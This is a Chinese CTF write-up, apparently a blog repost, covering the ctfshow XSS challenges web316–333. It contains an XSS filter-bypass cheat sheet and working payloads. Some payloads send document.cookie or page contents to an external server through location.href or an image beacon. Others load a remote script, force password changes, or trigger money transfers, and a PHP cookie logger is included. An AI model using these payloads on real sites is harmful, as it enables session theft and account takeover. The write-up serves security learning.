当前位置: 首页 > news >正文

XSS(ctfshow)

xss绕过技巧

基础标签(通用绕过)

标签

示例 payload

适用场景

<script>

<script>alert(1)</script>

基础注入,易被过滤

<img>

<img src=x onerror=alert(1)>

利用onerror

事件触发

<svg>

<svg/onload=alert(1)>

短小高效,绕过空格过滤

<iframe>

<iframe src="javascript:alert(1)">

嵌入JS伪协议

<a>

<a href="javascript:alert(1)">x</a>

需用户点击触发

<body>

<body onload=alert(1)>

页面加载时触发

事件处理器

通过HTML事件属性触发JS代码,无需<script>标签:

事件属性

示例 payload

说明

onerror

<img src=x onerror=alert(1)>

图片加载失败时触发

onload

<body onload=alert(1)>

页面/元素加载完成时触发

onmouseover

<div onmouseover=alert(1)>x</div>

鼠标悬停触发(需交互)

onfocus

<input autofocus onfocus=alert(1)>

元素获取焦点时触发(需交互)

onclick

<button onclick=alert(1)>x</button>

点击触发(需交互)

冷门标签(绕过WAF)

标签

示例 payload

绕过思路

<details>

<details open ontoggle=alert(1)>

利用ontoggle

事件

<audio>

<audio src=x onerror=alert(1)>

类似<img>

但较少被过滤

<video>

<video><source onerror=alert(1)>

多标签嵌套绕过

<marquee>

<marquee onscroll=alert(1)>x</marquee>

老旧标签,可能绕过检测

<embed>

<embed src=javascript:alert(1)>

嵌入JS伪协议

编码与混淆绕过

1. HTML实体编码
&lt;img src=x onerror=alert(1)&gt;
2. JS编码
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x31\x29')>

3. Unicode编码
<img src=x onerror=alert(1)>
<!-- 等价于 -->
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>

特殊场景绕过技巧

1. 闭合已有标签
</textarea><script>alert(1)</script>
2. 利用属性注入
<input type="text" value="" autofocus onfocus=alert(1)>
3. CSS注入
<style>@import url("javascript:alert(1)");</style>

AJAX 请求

  • 定义:异步javascript和xml,一种无需重新加载整个网页的情况下,能够更新部分网页的技术

  • 特点:异步通信,局部刷新,基于 XMLHttpRequest 对象

jQuery AJAX

$.ajax({url: "example.php",method: "POST",data: { name: "John", age: 30 },success: function(response) {console.log(response);}
});

web316

简单测试一下<script>alert(1)</script>语句,发现可行

此脚本实现的功能为从URL的GET参数获取cookie值,并且把当前时间格式化追加到cookie.txt文件

在服务器端设置一个php文件获取网站cookie

在题目中输入此代码访问

<script>location.href="http:/(自己服务器的公网ip)/test.php?cookie="+document.cookie</script>
//location.href = "..." 强制浏览器跳转到指定的url,并获取当前网站的所有cookie

可以看到服务器端已经出现了cookie.text文件,其中就有flag

web317-319

简单测试一下<script>alert(1)</script>语句,发现不可行

可以用body标签

318 319一样

web320-321(过滤空格)

空格可以用%09(tab)//**/、%0a(换行)代替

<body/**/onload="window.location.href='http://47.111.94.227/test.php?cookie='+document.cookie"></body>
<body/onload="window.location.href='http://47.111.94.227/test.php?cookie='+document.cookie"></body>

web322-326

过滤了script,img,iframe,xss,空格,分号,逗号。

<body/onload="window.location.href='http://47.111.94.227/test.php?cookie='+document.cookie"></body>

web327(存储型)

这里的收件人要是admin,payload是一样的

web328

在注册页面输入payload

<script>document.location.href="http://47.111.94.227/test.php?cookie="+document.cookie</script>

返回

者应该是管理员的cookie值

把cookie值改成PHPSESSID=fofmvp71963lcr1olhqdhpaos0,改包发送,得到flag

web329

根据上题的思路再次尝试,发现不行,应该是cookie立即失效了

payload,基本思路就是利用js文件进入管理员页面,并直接把相关信息带出

<?php $cookie = $_GET['cookie'];$myFile = "cookie.txt";file_put_contents($myFile, $cookie, FILE_APPEND);
?>
var img = new Image();
img.src = 'http://47.111.94.227/cookie.php+document.querySelector('#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main').textContent;
document.body.append(img);
  • document.querySelector(...) 的作用是:

  • 通过 CSS 选择器 定位到页面的某个元素。

  • 提取该元素的 textContent(文本内容)。

<script src=http://47.111.94.227/1.js></script>
//利用注册输入

返回了admin账号的密码,登录拦截就可以得到

web330

新增了修改密码的功能,抓包看一下,想到构造<script>document.location.href="http://127.0.0.1/api/change.php?p=123456"</script>

直接修改管理员密码

这里127.0.0.1是因为数据库是本地的

登录成功后抓包

web331

发现请求方式变成了post

把payload改成post形式的

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123456'}})</script>

登录即可

web332-333

加了一些转账的相关功能

方法一:

先尝试把转账金额改成负数,或者向自己转账都能让钱变多。

方法二:

脚本

// a.js
$.ajax({url: "http://127.0.0.1/api/amount.php",method: "POST",data:{'u':'test','a':10000},cache: false,success: function(res){
}});

利用注册<script src="http://47.111.94.227/a.js"></script>

http://www.lryc.cn/news/584170.html

相关文章:

  • cpu利用率,系统吞吐量,周转时间,等待时间,响应时间详解(操作系统)
  • 二进制安全-汇编语言-06-包含多个段的程序
  • QBoost 2025版:加速手机性能,提升使用体验
  • pytorch深度学习-Lenet-Minist
  • 从零开始搭建深度学习大厦系列-2.卷积神经网络基础(5-9)
  • 基于 Flutter 的开源文本 TTS 朗读器(支持 Windows/macOS/Android)
  • 从零实现一个GPT 【React + Express】--- 【2】实现对话流和停止生成
  • Flink Exactly Once 和 幂等
  • Spring for Apache Pulsar->Reactive Support->Message Consumption
  • wpf使用webview2显示网页内容(最低兼容.net framework4.5.2)
  • 以太网基础⑤UDP 协议原理与 FPGA 实现
  • 西电考研录取:哪些省份考研上岸西电更容易?
  • websocket的客户端(发送接收json的消息)
  • TCP-与-UDP-协议详解:原理、区别与应用场景全解析
  • 自动驾驶环境感知:天气数据采集与融合技术实战
  • 关键字前跟空格或首字母, 关键字后跟空格或标点符号; 标点符号后面不是必须跟空格;
  • Duplicate cleaner pro 的使用技巧
  • 汽车加气站操作工分类有几种
  • 制作一款打飞机游戏78:游戏选项
  • 城市脉搏中的隐形守护者
  • 羊肚菌自动采收车设计cad【7张】+三维图+设计说明书
  • U-Boot 2025.07 引入的 “uthreads” 优势介绍
  • 【三维重建】开源slam数据集介绍
  • ssh: connect to host github.com port 22: connection refused
  • 微服务架构下某汽车APP电商模块订单服务自动化测试方案(Python蹭个场)
  • 庄懂的水特效AP01/L16/Water
  • 【TCP/IP】10. 引导协议与动态主机配置协议
  • 汽车功能安全-软件集成和验证(Software Integration Verification)【目的、验证输入、集成验证要求】9
  • RHCE考试 ——笔记
  • 接口(上篇)